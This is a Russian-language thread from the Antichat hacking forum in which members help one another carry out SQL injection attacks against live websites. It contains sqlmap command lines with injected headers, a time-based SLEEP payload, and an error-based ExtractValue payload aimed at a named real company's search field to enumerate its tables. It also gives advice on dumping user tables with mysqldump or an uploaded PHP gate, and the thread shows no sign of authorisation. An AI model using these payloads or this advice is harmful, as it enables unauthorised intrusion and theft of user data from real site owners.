ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #24161  
Старый 01.03.2015, 12:44
andrxx
Новичок
Регистрация: 07.11.2013
Сообщений: 12
С нами: 6586166

Репутация: 0
По умолчанию

Цитата:
Сообщение от Unknowhacker  
Есть способ заливки шелла через infophp.php при отсутствии инклуда?!
есть, но необходимо наличие фтп или цпанель
 
Ответить с цитированием

  #24162  
Старый 01.03.2015, 16:03
Unknowhacker
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами: 6825206

Репутация: 24
По умолчанию

Цитата:
Сообщение от andrxx  
есть, но необходимо наличие фтп или цпанель
ftp://site.com - доступ требует авторизацию, ЦП панель так же требует авторизацию. Ну и какой способ
 
Ответить с цитированием

  #24163  
Старый 01.03.2015, 16:16
preno
Участник форума
Регистрация: 05.09.2010
Сообщений: 245
С нами: 8255126

Репутация: 0
По умолчанию

Цитата:
Сообщение от lifescore  
./sqlmap.py --headers="
User-Agent: Mozilla/5.0 Gecko/20120101 Firefox/26.0
" --cookie="
%Query_Cookie%
" -u '
http://url.com/path/?id=1
' --level=5 risk=3 -p
%Parametr%
Или
-r
и путь к файлу с HTTP запросом
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]POST[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]vuln[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php HTTP[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]1.1

Host
[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]www[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]target[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]com

User
[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]Agent[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Mozilla[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]4.0

id
[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][/COLOR
Способ на первый взгляд сработал, вектор запросов найден, timebased SQL, я дошёл до финальной стадии когда SQLmap предлагает ввести произвольный SQL запрос и выполнить его, однако он не выполняется, на любой запрос выводит none

Пробую способ:

./sqlmap.py --headers="User-Agent: Mozilla/5.0 Gecko/20120101 *" -u "http://url.com/path/?id=1" --level=5 risk=3 --dbms="MySQL"

Вектор атаки найден:

Payload: User-Agent: Mozilla/5.0 Gecko/20120101') AND SLEEP(5)#

Однако, в SQL иньекции фильтруются запятые, а так как я не силен в timebased векторах, то даже предположить не могу, возможно ли провести timebased атаку без запятых и выполнить грубо говоря запрос select password from user

После найденного вектора запускаю скрипт:

./sqlmap.py --headers="User-Agent: Mozilla/5.0 Gecko/20120101 *" -u "http://url.com/path/?id=1" --level=5 risk=3 --dbms="MySQL" --sql-query="SELECT user()"

Он ждет минут 5-10 в retrieved:, пытается выполнить запрос и вытащить ответ, и по истечению времени вываливает:

SELECT user(): None

И так на любой SQL запрос. И вот вопрос, это из за запятых невозможно провести атаку, или я что то не так делаю? Подскажите пожалуйста!
 
Ответить с цитированием

  #24164  
Старый 01.03.2015, 16:59
Unknowhacker
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами: 6825206

Репутация: 24
По умолчанию

Интересует вывод таблиц из этой инъекции:

Код:
http://naftogaz-europe.com
Note:в поле поиск '
 
Ответить с цитированием

  #24165  
Старый 01.03.2015, 17:28
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами: 8469890

Репутация: 0
По умолчанию

Цитата:
Сообщение от Unknowhacker  
Интересует вывод таблиц из этой инъекции:
Код:
http://naftogaz-europe.com
Note:
в поле поиск
'
'or(ExtractValue(1,concat(0x3a,(select(table_name) from(information_schema.tables)limit/**/0,1))))='1
 
Ответить с цитированием

  #24166  
Старый 03.03.2015, 06:58
MaxFast
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
С нами: 7676246

Репутация: 94


По умолчанию

Каким образом под никсами слить огромную таблицу с юзерами? SQLMap даже не может.
 
Ответить с цитированием

  #24167  
Старый 03.03.2015, 07:10
andrxx
Новичок
Регистрация: 07.11.2013
Сообщений: 12
С нами: 6586166

Репутация: 0
По умолчанию

Цитата:
Сообщение от MaxFast  
Каким образом под никсами слить огромную таблицу с юзерами? SQLMap даже не может.
mysqldump
 
Ответить с цитированием

  #24168  
Старый 03.03.2015, 15:20
5maks5
Постоянный
Регистрация: 29.08.2010
Сообщений: 448
С нами: 8265206

Репутация: 40
По умолчанию

Цитата:
Сообщение от MaxFast  
Каким образом под никсами слить огромную таблицу с юзерами? SQLMap даже не может.
SQLYog. PHP Gate кидаешь на хост, где mysql расположен, с компа подключаешься.

Единственный минус - будет долго рожать.

Базы от нескольких гб - от получаса.

Зато валидный дамп, что не может не радовать.
 
Ответить с цитированием

  #24169  
Старый 05.03.2015, 01:21
Xsite
Новичок
Регистрация: 21.01.2010
Сообщений: 0
С нами: 8581933

Репутация: 0
По умолчанию

Ребят помогите советом )

При "расковыривании" инъекций допустим тайм блинд ,скл меп ,оооочень долго дампит ,допустим 1 фразу ,слово и тд и тп. Если варианты ,слить дб при таких инъекциях быстрее ?
 
Ответить с цитированием

  #24170  
Старый 05.03.2015, 02:34
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию

Цитата:
Сообщение от Xsite  
Ребят помогите советом )
При "расковыривании" инъекций допустим тайм блинд ,скл меп ,оооочень долго дампит ,допустим 1 фразу ,слово и тд и тп. Если варианты ,слить дб при таких инъекциях быстрее ?
слить быстрее через инъекцию основанную на задержках? ну не знаю склмап не всегда точно может определить подходящий для случая вектор, поэтому пробуйте сначала руками, и если есть другие варианты — автоматизируйте сами.
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 11 (пользователей: 0 , гостей: 11)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.